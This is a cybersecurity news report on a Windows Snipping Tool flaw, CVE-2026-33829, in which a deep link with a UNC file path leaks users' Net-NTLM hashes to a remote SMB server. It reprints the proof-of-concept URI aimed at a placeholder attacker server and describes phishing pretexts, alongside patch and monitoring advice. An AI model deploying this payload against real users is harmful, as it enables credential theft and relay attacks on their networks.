PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability

Home Cyber Security PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft’s Snipping Tool that allows attackers to silently steal users’ Net-NTLM credential hashes by luring them to a malicious webpage. Tracked as CVE-2026-33829, the flaw resides in how Windows Snipping Tool handles deep link URI registrations using the ms-screensketch protocol schema. Affected versions of the application register this deep link, which accepts a filePath parameter. Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim’s Net-NTLM hash in the process. The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public. Windows Snipping Tool PoC Exploitation requires minimal technical sophistication. An attacker simply needs to host a malicious URL — or an HTML page that auto-triggers the deep link and convince the target to visit it. The PoC from Black Arrow Security demonstrates the attack with a single browser-triggered URI: textms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, Windows automatically transmits the user’s Net-NTLM authentication response to the attacker’s server, exposing credentials that can then be cracked offline or used in NTLM relay attacks against internal network resources. What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to social engineering campaigns. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document. An attacker could register a domain like snip.example.com and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes. The victim sees nothing unusual; the Snipping Tool opens as expected while NTLM authentication occurs transparently in the background. This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common. Patch Availability and Timeline Microsoft addressed the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows: March 23, 2026 — Vulnerability reported to Microsoft. April 14, 2026 — Microsoft releases a security patch. April 14, 2026 — Coordinated public advisory and PoC release. Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update. Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status. Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories. RELATED ARTICLESMORE FROM AUTHOR Cyber Security News iTerm2 Flaw Abuses SSH Integration Escape Sequences to Turn Text Into Code Execution cryptocurrency British National Admits Hacking Companies and Stealing Millions in Virtual Currency Cyber Security News Critical Gardyn Smart Gardens Vulnerabilities Let Attackers Control Devices Remotely Top 10 Top 10 Best User Access Management Tools in 2026 April 4, 2026 Top 10 Best VPN For Chrome in 2026 April 4, 2026 20 Best Application Performance Monitoring Tools in 2026 April 3, 2026 Top 10 Best VPN For Linux In 2026 April 3, 2026 10 Best VPN For Privacy In 2026 April 2, 2026